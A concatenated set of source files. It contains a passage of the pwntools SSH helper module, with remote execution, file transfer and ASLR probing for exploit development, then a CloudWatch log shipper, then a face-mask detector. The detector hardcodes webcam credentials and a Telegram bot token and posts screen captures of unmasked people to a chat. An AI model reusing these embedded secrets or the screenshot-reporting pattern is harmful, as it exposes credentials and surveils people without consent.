>>> _ = py.recvuntil(b'>>> ')
>>> py.sendline(b'print(2+2)')
>>> py.sendline(b'exit')
>>> print(repr(py.recvline()))
b'4\n'
>>> s.system('env | grep -a AAAA', env={'AAAA': b'\x90'}).recvall()
b'AAAA=\x90\n'
"""
if wd is None:
wd = self.cwd
if timeout is None:
timeout = self.timeout
return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable on the remote
system.
Note:
The exact address will differ based on what other environment
variables are set, as well as argv[0]. In order to ensure that
the path is *exactly* the same, it is recommended to invoke the
process with ``argv=[]``.
"""
script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
with context.local(log_level='error'):
python = self.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.process(['','-c', script.strip()], executable=python, **kwargs)
result = io.recvall()
try:
return int(result) & context.mask
except ValueError:
self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
Run a command on the remote server and return a tuple with
(data, exit_status). If `tty` is True, then the command is run inside
a TTY on the remote server.
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(s.run_to_end('echo Hello; exit 17'))
(b'Hello\n', 17)
"""
with context.local(log_level = 'ERROR'):
c = self.run(process, tty, wd = wd, timeout = Timeout.default)
data = c.recvall()
retcode = c.wait()
c.close()
return data, retcode
def connect_remote(self, host, port, timeout = Timeout.default):
r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
Connects to a host through an SSH connection. This is equivalent to
using the ``-L`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
Examples:
>>> from pwn import *
>>> l = listen()
>>> s = ssh(host='example.pwnme')
>>> a = s.connect_remote(s.host, l.lport)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_connecter(self, host, port, timeout, level=self.level)
remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
Listens remotely through an SSH connection. This is equivalent to
using the ``-R`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
Examples:
>>> from pwn import *
>>> s = ssh(host='example.pwnme')
>>> l = s.listen_remote()
>>> a = remote(s.host, l.port)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_listener(self, bind_address, port, timeout, level=self.level)
listen = listen_remote
def __getitem__(self, attr):
"""Permits indexed access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(repr(s['echo hello']))
b'hello'
"""
return self.run(attr).recvall().strip()
def __call__(self, attr):
"""Permits function-style access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(repr(s('echo hello')))
b'hello'
"""
return self.run(attr).recvall().strip()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> s.echo('hello')
b'hello'
>>> s.whoami()
b'travis'
>>> s.echo(['huh','yay','args'])
b'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
@LocalContext
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr]
command.extend(args[0])
else:
command = [attr]
command.extend(args)
command = b' '.join(packing._need_bytes(arg, min_wrong=0x80) for arg in command)
return self.run(command).recvall().strip()
return runner
def connected(self):
"""Returns True if we are connected.
Example:
>>> s = ssh(host='example.pwnme')
>>> s.connected()
True
>>> s.close()
>>> s.connected()
False
"""
return bool(self.client and self.client.get_transport().is_active())
def close(self):
"""Close the connection."""
if self.client:
self.client.close()
self.client = None
self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
"""Return a dictionary of the libraries used by a remote file."""
escaped_remote = sh_string(remote)
cmd = ''.join([
'(',
'ulimit -s unlimited;',
'ldd %s > /dev/null &&' % escaped_remote,
'(',
'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
'ldd %s' % escaped_remote,
'))',
' 2>/dev/null'
])
data, status = self.run_to_end(cmd)
if status != 0:
self.error('Unable to find libraries for %r' % remote)
return {}
return misc.parse_ldd_output(packing._decode(data))
def _get_fingerprint(self, remote):
cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
cmd = cmd + sh_string(remote)
data, status = self.run_to_end(cmd)
if status != 0:
return None
# OpenSSL outputs in the format of...
# (stdin)= e3b0c4429...
data = data.replace(b'(stdin)= ',b'')
# sha256 and sha256sum outputs in the format of...
# e3b0c442... -
data = data.replace(b'-',b'').strip()
if not isinstance(data, str):
data = data.decode('ascii')
return data
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
def _download_raw(self, remote, local, h):
def update(has, total):
h.status("%s/%s" % (misc.size(has), misc.size(total)))
if self.sftp:
try:
self.sftp.get(remote, local, update)
return
except IOError:
pass
cmd = 'wc -c < ' + sh_string(remote)
total, exitcode = self.run_to_end(cmd)
if exitcode != 0:
h.failure("%r does not exist or is not accessible" % remote)
return
total = int(total)
with context.local(log_level = 'ERROR'):
cmd = 'cat < ' + sh_string(remote)
c = self.run(cmd)
data = b''
while True:
try:
data += c.recv()
except EOFError:
break
update(len(data), total)
result = c.wait()
if result != 0:
h.failure('Could not download file %r (%r)' % (remote, result))
return
with open(local, 'wb') as fd:
fd.write(data)
def _download_to_cache(self, remote, p):
with context.local(log_level='error'):
remote = self.readlink('-f',remote)
if not hasattr(remote, 'encode'):
remote = remote.decode('utf-8')
fingerprint = self._get_fingerprint(remote)
if fingerprint is None:
local = os.path.normpath(remote)
local = os.path.basename(local)
local += time.strftime('-%Y-%m-%d-%H:%M:%S')
local = os.path.join(self._cachedir, local)
self._download_raw(remote, local, p)
return local
local = self._get_cachefile(fingerprint)
if self.cache and self._verify_local_fingerprint(fingerprint):
p.success('Found %r in ssh cache' % remote)
else:
self._download_raw(remote, local, p)
if not self._verify_local_fingerprint(fingerprint):
p.error('Could not download file %r' % remote)
return local
def download_data(self, remote):
"""Downloads a file from the remote server and returns it as a string.
Arguments:
remote(str): The remote filename to download.
Examples:
>>> with open('/tmp/bar','w+') as f:
... _ = f.write('Hello, world')
>>> s = ssh(host='example.pwnme',
... cache=False)
>>> s.download_data('/tmp/bar')
b'Hello, world'
>>> s._sftp = None
>>> s._tried_sftp = True
>>> s.download_data('/tmp/bar')
b'Hello, world'
"""
with self.progress('Downloading %r' % remote) as p:
with open(self._download_to_cache(remote, p), 'rb') as fd:
return fd.read()
def download_file(self, remote, local = None):
"""Downloads a file from the remote server.
The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
calling the function twice has little overhead.
Arguments:
remote(str): The remote filename to download
local(str): The local filename to save it to. Default is to infer it from the remote filename.
"""
if not local:
local = os.path.basename(os.path.normpath(remote))
if os.path.basename(remote) == remote:
remote = os.path.join(self.cwd, remote)
with self.progress('Downloading %r to %r' % (remote, local)) as p:
local_tmp = self._download_to_cache(remote, p)
# Check to see if an identical copy of the file already exists
if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
"""Recursively downloads a directory from the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
if self.sftp:
remote = str(self.sftp.normalize(remote))
else:
with context.local(log_level='error'):
remote = self.system('readlink -f ' + sh_string(remote))
basename = os.path.basename(remote)
local = local or '.'
local = os.path.expanduser(local)
self.info("Downloading %r to %r" % (basename,local))
with context.local(log_level='error'):
remote_tar = self.mktemp()
cmd = 'tar -C %s -czf %s %s' % \
(sh_string(remote),
sh_string(remote_tar),
sh_string(basename))
tar = self.system(cmd)
if 0 != tar.wait():
self.error("Could not create remote tar")
local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
self.download_file(remote_tar, local_tar.name)
tar = tarfile.open(local_tar.name)
tar.extractall(local)
def upload_data(self, data, remote):
"""Uploads some data into a file on the remote server.
Arguments:
data(str): The data to upload.
remote(str): The filename to upload it to.
Example:
>>> s = ssh(host='example.pwnme')
>>> s.upload_data(b'Hello, world', '/tmp/upload_foo')
>>> print(open('/tmp/upload_foo').read())
Hello, world
>>> s._sftp = False
>>> s._tried_sftp = True
>>> s.upload_data(b'Hello, world', '/tmp/upload_bar')
>>> print(open('/tmp/upload_bar').read())
Hello, world
"""
data = packing._need_bytes(data)
# If a relative path was provided, prepend the cwd
if os.path.normpath(remote) == os.path.basename(remote):
remote = os.path.join(self.cwd, remote)
if self.sftp:
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.sftp.put(f.name, remote)
return
with context.local(log_level = 'ERROR'):
cmd = 'cat > ' + sh_string(remote)
s = self.run(cmd, tty=False)
s.send(data)
s.shutdown('send')
data = s.recvall()
result = s.wait()
if result != 0:
self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
"""Uploads a file to the remote server. Returns the remote filename.
Arguments:
filename(str): The local filename to download
remote(str): The remote filename to save it to. Default is to infer it from the local filename."""
if remote is None:
remote = os.path.normpath(filename)
remote = os.path.basename(remote)
remote = os.path.join(self.cwd, remote)
with open(filename, 'rb') as fd:
data = fd.read()
self.info("Uploading %r to %r" % (filename,remote))
self.upload_data(data, remote)
return remote
def upload_dir(self, local, remote=None):
"""Recursively uploads a directory onto the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
local = os.path.expanduser(local)
dirname = os.path.dirname(local)
basename = os.path.basename(local)
if not os.path.isdir(local):
self.error("%r is not a directory" % local)
msg = "Uploading %r to %r" % (basename,remote)
with self.waitfor(msg):
# Generate a tarfile with everything inside of it
local_tar = tempfile.mktemp()
with tarfile.open(local_tar, 'w:gz') as tar:
tar.add(local, basename)
# Upload and extract it
with context.local(log_level='error'):
remote_tar = self.mktemp('--suffix=.tar.gz')
self.upload_file(local_tar, remote_tar)
untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
message = untar.recvrepeat(2)
if untar.wait() != 0:
self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
"""upload(file_or_directory, remote=None)
Upload a file or directory to the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
remote(str): Local path to store the data.
By default, uses the working directory.
"""
if isinstance(file_or_directory, str):
file_or_directory = os.path.expanduser(file_or_directory)
file_or_directory = os.path.expandvars(file_or_directory)
if os.path.isfile(file_or_directory):
return self.upload_file(file_or_directory, remote)
if os.path.isdir(file_or_directory):
return self.upload_dir(file_or_directory, remote)
self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
"""download(file_or_directory, local=None)
Download a file or directory from the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
local(str): Local path to store the data.
By default, uses the current directory.
"""
if not self.sftp:
self.error("Cannot determine remote file type without SFTP")
with self.system('test -d ' + sh_string(file_or_directory)) as io:
is_dir = io.wait()
if 0 == is_dir:
self.download_dir(file_or_directory, local)
else:
self.download_file(file_or_directory, local)
put = upload
get = download
def unlink(self, file):
"""unlink(file)
Delete the file on the remote host
Arguments:
file(str): Path to the file
"""
if not self.sftp:
self.error("unlink() is only supported if SFTP is supported")
return self.sftp.unlink(file)
def libs(self, remote, directory = None):
"""Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output
and downloading the relevant files.
The directory argument specified where to download the files. This defaults
to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server."""
libs = self._libs_remote(remote)
remote = packing._decode(self.readlink('-f',remote).strip())
libs[remote] = 0
if directory is None:
directory = self.host
directory = os.path.realpath(directory)
res = {}
seen = set()
for lib, addr in libs.items():
local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
if not local.startswith(directory):
self.warning('This seems fishy: %r' % lib)
continue
misc.mkdir_p(os.path.dirname(local))
if lib not in seen:
self.download_file(lib, local)
seen.add(lib)
res[local] = addr
return res
def interactive(self, shell=None):
"""Create an interactive session.
This is a simple wrapper for creating a new
:class:`pwnlib.tubes.ssh.ssh_channel` object and calling
:meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
s = self.shell(shell)
if self.cwd != '.':
cmd = 'cd ' + sh_string(self.cwd)
s.sendline(cmd)
s.interactive()
s.close()
def set_working_directory(self, wd = None, symlink = False):
"""Sets the working directory in which future commands will
be run (via ssh.run) and to which files will be uploaded/downloaded
from if no path is provided
Note:
This uses ``mktemp -d`` under the covers, sets permissions
on the directory to ``0700``. This means that setuid binaries
will **not** be able to access files created in this directory.
In order to work around this, we also ``chmod +x`` the directory.
Arguments:
wd(string): Working directory. Default is to auto-generate a directory
based on the result of running 'mktemp -d' on the remote machine.
symlink(bool,str): Create symlinks in the new directory.
The default value, ``False``, implies that no symlinks should be
created.
A string value is treated as a path that should be symlinked.
It is passed directly to the shell on the remote end for expansion,
so wildcards work.
Any other value is treated as a boolean, where ``True`` indicates
that all files in the "old" working directory should be symlinked.
Examples:
>>> s = ssh(host='example.pwnme')
>>> cwd = s.set_working_directory()
>>> s.ls()
b''
>>> packing._decode(s.pwd()) == cwd
True
>>> s = ssh(host='example.pwnme')
>>> homedir = s.pwd()
>>> _=s.touch('foo')
>>> _=s.set_working_directory()
>>> assert s.ls() == b''
>>> _=s.set_working_directory(homedir)
>>> assert b'foo' in s.ls().split(), s.ls().split()
>>> _=s.set_working_directory(symlink=True)
>>> assert b'foo' in s.ls().split(), s.ls().split()
>>> assert homedir != s.pwd()
>>> symlink=os.path.join(homedir,b'*')
>>> _=s.set_working_directory(symlink=symlink)
>>> assert b'foo' in s.ls().split(), s.ls().split()
>>> assert homedir != s.pwd()
"""
status = 0
if symlink and not isinstance(symlink, (six.binary_type, six.text_type)):
symlink = os.path.join(self.pwd(), b'*')
if not hasattr(symlink, 'encode') and hasattr(symlink, 'decode'):
symlink = symlink.decode('utf-8')
if not wd:
wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
wd = wd.strip()
if status:
self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))
else:
cmd = b'ls ' + sh_string(wd)
_, status = self.run_to_end(cmd, wd = '.')
if status:
self.error("%r does not appear to exist" % wd)
if not isinstance(wd, str):
wd = wd.decode('utf-8')
self.cwd = wd
self.info("Working directory: %r" % self.cwd)
if symlink:
self.ln('-s', symlink, '.')
return wd
def write(self, path, data):
"""Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
data = packing._need_bytes(data)
return self.upload_data(data, path)
def read(self, path):
"""Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
return self.download_data(path)
def _init_remote_platform_info(self):
r"""Fills _platform_info, e.g.:
::
{'distro': 'Ubuntu\n',
'distro_ver': '14.04\n',
'machine': 'x86_64',
'node': 'pwnable.kr',
'processor': 'x86_64',
'release': '3.11.0-12-generic',
'system': 'linux',
'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
"""
if self._platform_info:
return
def preexec():
import platform
print('\n'.join(platform.uname()))
with context.quiet:
with self.process('true', preexec_fn=preexec) as io:
self._platform_info = {
'system': io.recvline().lower().strip().decode(),
'node': io.recvline().lower().strip().decode(),
'release': io.recvline().lower().strip().decode(),
'version': io.recvline().lower().strip().decode(),
'machine': io.recvline().lower().strip().decode(),
'processor': io.recvline().lower().strip().decode(),
'distro': 'Unknown',
'distro_ver': ''
}
try:
if not self.which('lsb_release'):
return
with self.process(['lsb_release', '-irs']) as io:
lsb_info = io.recvall().strip().decode()
self._platform_info['distro'], self._platform_info['distro_ver'] = lsb_info.split()
except Exception:
pass
@property
def os(self):
""":class:`str`: Operating System of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(os=self._platform_info['system']):
return context.os
except Exception:
return "Unknown"
@property
def arch(self):
""":class:`str`: CPU Architecture of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(arch=self._platform_info['machine']):
return context.arch
except Exception:
return "Unknown"
@property
def bits(self):
""":class:`str`: Pointer size of the remote machine."""
try:
with context.local():
context.clear()
context.arch = self.arch
return context.bits
except Exception:
return context.bits
@property
def version(self):
""":class:`tuple`: Kernel version of the remote machine."""
try:
self._init_remote_platform_info()
vers = self._platform_info['release']
# 3.11.0-12-generic
expr = r'([0-9]+\.?)+'
vers = re.search(expr, vers).group()
return tuple(map(int, vers.split('.')))
except Exception:
return (0,0,0)
@property
def distro(self):
""":class:`tuple`: Linux distribution name and release."""
try:
self._init_remote_platform_info()
return (self._platform_info['distro'], self._platform_info['distro_ver'])
except Exception:
return ("Unknown", "Unknown")
@property
def aslr(self):
""":class:`bool`: Whether ASLR is enabled on the system.
Example:
>>> s = ssh("travis", "example.pwnme")
>>> s.aslr
True
"""
if self._aslr is None:
if self.os != 'linux':
self.warn_once("Only Linux is supported for ASLR checks.")
self._aslr = False
else:
with context.quiet:
rvs = self.read('/proc/sys/kernel/randomize_va_space')
self._aslr = not rvs.startswith(b'0')
return self._aslr
@property
def aslr_ulimit(self):
""":class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
import pwnlib.elf.elf
import pwnlib.shellcraft
if self._aslr_ulimit is not None:
return self._aslr_ulimit
# This test must run a 32-bit binary, fix the architecture
arch = {
'amd64': 'i386',
'aarch64': 'arm'
}.get(self.arch, self.arch)
with context.local(arch=arch, bits=32, os=self.os, aslr=True):
with context.quiet:
try:
sc = pwnlib.shellcraft.cat('/proc/self/maps') \
+ pwnlib.shellcraft.exit(0)
elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
except Exception:
self.warn_once("Can't determine ulimit ASLR status")
self._aslr_ulimit = False
return self._aslr_ulimit
def preexec():
import resource
try:
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
except Exception:
pass
# Move to a new temporary directory
cwd = self.cwd
tmp = self.set_working_directory()
try:
self.upload(elf.path, './aslr-test')
except IOError:
self.warn_once("Couldn't check ASLR ulimit trick")
self._aslr_ulimit = False
return False
self.process(['chmod', '+x', './aslr-test']).wait()
maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()
# Move back to the old directory
self.cwd = cwd
# Clean up the files
self.process(['rm', '-rf', tmp]).wait()
# Check for 555555000 (1/3 of the address space for PAE)
# and for 40000000 (1/3 of the address space with 3BG barrier)
self._aslr_ulimit = bool(b'55555000' in maps or b'40000000' in maps)
return self._aslr_ulimit
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
elif os.path.exists(path):
with open(path, 'r+') as f:
return f.read()
def checksec(self, banner=True):
"""checksec()
Prints a helpful message about the remote system.
Arguments:
banner(bool): Whether to print the path to the ELF binary.
"""
cached = self._checksec_cache()
if cached:
return cached
red = text.red
green = text.green
yellow = text.yellow
res = [
"%s@%s:" % (self.user, self.host),
"Distro".ljust(10) + ' '.join(self.distro),
"OS:".ljust(10) + self.os,
"Arch:".ljust(10) + self.arch,
"Version:".ljust(10) + '.'.join(map(str, self.version)),
"ASLR:".ljust(10) + {
True: green("Enabled"),
False: red("Disabled")
}[self.aslr]
]
if self.aslr_ulimit:
res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]
cached = '\n'.join(res)
self._checksec_cache(cached)
return cached
|
main.py
|
import json
import threading
import time
from threading import Lock
from cloudwatch.config import *
import boto3
from cloudwatch.cwl import CloudWatchLogs
from cloudwatch.consumer_mixpanel import MixpanelConsumer
from cloudwatch.consumer_filesystem import FileSystemConsumer
from cloudwatch.utils import create_file_if_does_not_exist
"""
GLOBALS GO HERE
the log stream map is a log stream discovery mechanism that lets the main process
know which threads are working on which log streams
Key: Tuple(log group name, log stream name), value: the thread id (optional for now)
Basically we want a set of the log streams currently being processed so that later they
can be reaped from this map when the thread is "Done" or more threads can be added to it
as we discover more log streams
"""
LOG_STREAM_MAP = {}
LOG_STREAM_CHECKPOINT = {} # key = stream id, value = next token to be fetched
s3_client = boto3.client('s3')
class GlobalManager(object):
"""
Helper class to set/get shared state and variables
"""
def __init__(self):
self.lock = Lock()
def get_log_stream_map(self):
self.lock.acquire()
try:
return LOG_STREAM_MAP
finally:
self.lock.release()
def set_log_stream_map(self, key, value):
self.lock.acquire()
try:
logging.info("setting the stream {} to thread {}".format(key, value))
LOG_STREAM_MAP[key] = value
finally:
self.lock.release()
def delete_stream_from_map(self, key):
self.lock.acquire()
try:
if LOG_STREAM_MAP.get(key):
del LOG_STREAM_MAP[key]
finally:
self.lock.release()
def get_checkpoint(self):
self.lock.acquire()
try:
return LOG_STREAM_CHECKPOINT
finally:
self.lock.release()
def set_checkpoint(self, key, value):
self.lock.acquire()
try:
LOG_STREAM_CHECKPOINT[key] = value
finally:
self.lock.release()
gb = GlobalManager()
class LogStreamHandler(object):
def __init__(self, client):
self.aws_client = client
self.lock = Lock()
def write_log(self, log_group_name, log_stream_name, consumers):
"""
Writes the log to the log file
@param file_name: The log file name to be written to
@param log_group_name: The log group name
@param log_stream_name: The log stream name
@param consumers: List of consumers of type BaseConsumer
"""
# get the data from the log group
for _logs in self.aws_client.get_log_events(log_group_name, log_stream_name, gb):
# handle the log events
for _log in _logs:
for consumer in consumers:
consumer.process(_log, log_group_name, log_stream_name)
def _wanted_log_stream(self, log_stream_name):
return True
def _remove_old_streams(self, streams):
"""
Removes any old streams from the LOG_STREAM_MAP
"""
for stream in streams:
if not gb.get_log_stream_map().get(LOG_GROUP_NAME, stream):
logging.warning("CLEANING UP LOG STREAM: {}/{}".format(LOG_GROUP_NAME, stream))
k = (LOG_GROUP_NAME, stream)
gb.delete_stream_from_map(k)
def _discover_log_streams(self):
"""
This method is used by the main process to discover new log streams
and keep a shared state(map) of the log streams being worked on.
"""
log_streams = self.aws_client.get_log_streams(
log_group_name=LOG_GROUP_NAME, stream_lookback_count=STREAM_LOOKBACK_COUNT)
self._remove_old_streams(log_streams)
for log_stream in log_streams:
lsn = log_stream['logStreamName']
if not gb.get_log_stream_map().get((LOG_GROUP_NAME, lsn)):
# setting the value to None is an indication that no thread is working on the log stream
if self._wanted_log_stream(lsn):
logging.info("Log stream {} not tracked - starting to track".format(lsn))
gb.set_log_stream_map((LOG_GROUP_NAME, lsn), None)
else:
logging.info("Stream {} already being processed".format(log_stream['logStreamName']))
logging.info("Log stream map: {}".format(gb.get_log_stream_map()))
def discover_log_streams(self):
"""
A daemon that continuously looks for log streams
"""
while True:
self._discover_log_streams()
time.sleep(TIME_DAEMON_SLEEP)
def _get_new_log_streams(self):
"""
Reads from the global log stream map to find any new streams that
have not been handled. If so, return those
"""
self.lock.acquire()
new_streams = []
logging.info("Stream map {}".format(gb.get_log_stream_map().items()))
for key, value in gb.get_log_stream_map().items():
if value is None:
new_streams.append(key)
if new_streams:
logging.info("Found new Streams: %s", str(new_streams))
self.lock.release()
return new_streams
def sync_new_logs(self):
"""
Syncs the newly discovered log streams to the file system by starting off
a thread that consumes those logs. Also marks the MAP for those streams as being processed
"""
while True:
new_streams = self._get_new_log_streams()
self.lock.acquire()
logging.info("New streams: {}".format(new_streams))
if not new_streams:
time.sleep(TIME_DAEMON_SLEEP)
for log_group_name, log_stream_name in new_streams:
log_getter = threading.Thread(
target=self.write_log, args=(log_group_name, log_stream_name, consumers))
logging.info("Consuming log stream: %s, %s %s", log_group_name, log_stream_name, log_getter)
gb.set_log_stream_map((log_group_name, log_stream_name), log_getter)
log_getter.start()
self.lock.release()
def persist_state(self, location='cwl.state'):
"""
Persist the checkpoint state in a specific location
:param state: Dictionary of key = stream (id), value = next token
:param location: location of file. #TODO save to s3 or dynamo later
"""
state = {}
while True:
state['modified_time'] = time.asctime()
state.update(gb.get_checkpoint())
state_json = json.dumps(state)
create_file_if_does_not_exist(location)
fhandle = open(location, 'w')
# handle the log events
fhandle.write(state_json)
fhandle.flush()
fhandle.close()
# with open(location, 'rb') as data:
# s3_client.upload_fileobj(data, 'cloudwatch.mixpanel.state', "{}-state".format(CWL_ENV))
time.sleep(1)
def configure_logging():
"""
Configure the logging
"""
logging.basicConfig(
filename=LOG_FILE,
level=LOG_LEVEL,
format=LOG_FORMAT
)
class LogProcessMonitor(object):
"""
Monitors the processes that write to the logs
"""
def __init__(self):
pass
def log_status(self):
"""
Logs the status of the processes
@param log_stream_map: the global log stream map the main process uses to orchestrate threads
"""
while True:
for _log_group_stream, _processing_thread in gb.get_log_stream_map().items():
logging.info(
"Log Group: {0}, Stream: {1} is processed by: {2}".format(
_log_group_stream[0], _log_group_stream[1], _processing_thread)
)
time.sleep(TIME_DAEMON_SLEEP)
def load_checkpoint():
try:
f = open('cwl.state', 'r')
checkpoint = f.read()
logging.info("checkpoint found")
checkpoint = json.loads(checkpoint)
logging.info("parsed checkpoint is %s", checkpoint)
del checkpoint['modified_time']
for key, value in checkpoint.items():
gb.set_checkpoint(key, value)
except Exception as ex:
logging.warning("No checkpoint found {}".format(repr(ex)))
if __name__ == '__main__':
try:
configure_logging()
client = CloudWatchLogs(AWS_ACCESS_KEY, AWS_SECRET_KEY, AWS_REGION, AWS_SESSION_TOKEN)
logstreamhandler = LogStreamHandler(client)
load_checkpoint()
mp_consumer = MixpanelConsumer()
fs_consumer = FileSystemConsumer()
consumers = []
if MIXPANEL_TOKEN:
consumers.append(mp_consumer)
if AWS_LOGS_DIRECTORY:
consumers.append(fs_consumer)
discover_log_streams_thread = threading.Thread(target=logstreamhandler.discover_log_streams, args=())
logs_getter_thread = threading.Thread(target=logstreamhandler.sync_new_logs, args=())
process_monitor_thread = threading.Thread(target=LogProcessMonitor().log_status, args=())
persist_stream_checkpoint = threading.Thread(target=logstreamhandler.persist_state, args=())
workers = [discover_log_streams_thread, logs_getter_thread, process_monitor_thread, persist_stream_checkpoint]
logging.info("Log stream map %s", gb.get_log_stream_map())
for worker in workers:
worker.daemon = True
worker.start()
while True:
logging.info("Heartbeat")
time.sleep(TIME_DAEMON_SLEEP)
# check the health of threads. restart if they have died and log loudly
for worker in workers:
if not worker.is_alive():
logging.exception(
"!! Worker thread {} died around time {} - restarting it.".format(worker.name, time.asctime())
)
worker.start()
except KeyboardInterrupt as ex:
logging.error("Keyboard interrupt received..")
|
face_mask_auto_ipwebcam.py
|
import cv2
import numpy as np
import os
import PIL
import time
import requests
import tensorflow as tf
import keras
import subprocess
# import screee
import multiprocessing
# from mss import mss
import pickle
labels = ["with_mask", "without_mask"]
url = "http://hjk:005@192.168.43.1:8080/shot.jpg" # replace it with 0 to use system default camera
# path to your model
os.chdir("convv")
model = keras.models.load_model("model.h5")
# path to haar cascade
os.chdir("/home/hemanth/PycharmProjects/face_mask_social_tele/dataa")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
"""
def hjk():
print("hii")
#os.system('captureimagecam.py')
"""
def main():
# time.sleep(5)
#import PIL.ImageGrab
#im = PIL.ImageGrab.grab()
#im.save('/home/hemanth/PycharmProjects/face_mask_social_tele/eporting_image/epotingimage.jpg')
# im.show()
# time.sleep(5)
import pyautogui
myScreenshot = pyautogui.screenshot()
myScreenshot.save(r'screenshot1.png')
files = {
'photo': open('screenshot1.png', 'rb')}
resp = requests.post('https://api.telegram.org/bot1661354902:AAF45IAEwKkmiyeyLv6dWxoQbjSWZb7DN-4/sendPhoto?chat_id'
'=-1001422894866&caption=Peoples violating covid protocol by not wearing face mask',
files=files)
# change with your chat id and bot token
print(resp.status_code)
while True:
cap = cv2.VideoCapture(url)
_, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
toTest = gray[y:y + h, x:x + w]
toTest = cv2.resize(toTest, (100, 100))
# cv2.imshow("test2", toTest) #shows the cropped image which is sent to cnn (optional)
toTest = toTest.reshape(1, 100, 100, 1)
prediction = model.predict(toTest, verbose=0)
if np.argmax(prediction) == 0:
cv2.rectangle(img, (x, y), (x + w, y + h), (48, 216, 48), 2)
cv2.putText(img, "Mask", (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (48, 216, 48), 2)
cv2.putText(img, str(round(prediction[0][0] * 100, 2)) + "%", (x, y + h + 30), cv2.FONT_HERSHEY_SIMPLEX,
0.9, (48, 216, 48), 2)
elif np.argmax(prediction) == 1:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
cv2.putText(img, "No mask", (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.9, (0, 0, 255), 2)
cv2.putText(img, str(round(prediction[0][1] * 100, 2)) + "%", (x, y + h + 30), cv2.FONT_HERSHEY_SIMPLEX,
0.9, (0, 0, 255), 2)
h = (np.argmax(prediction))
# time.sleep(5)
# print(h)
if h == 1:
if __name__ == '__main__':
main()
# subprocess.run("python screee.py")
# p1 = multiprocessing.Process(name='p1', target=dhjk)
# p1.start()
# os.system('screee.py')
print("nomask")
# time.sleep(3)
# print(tf.gather(labels, np.argmax(prediction)))
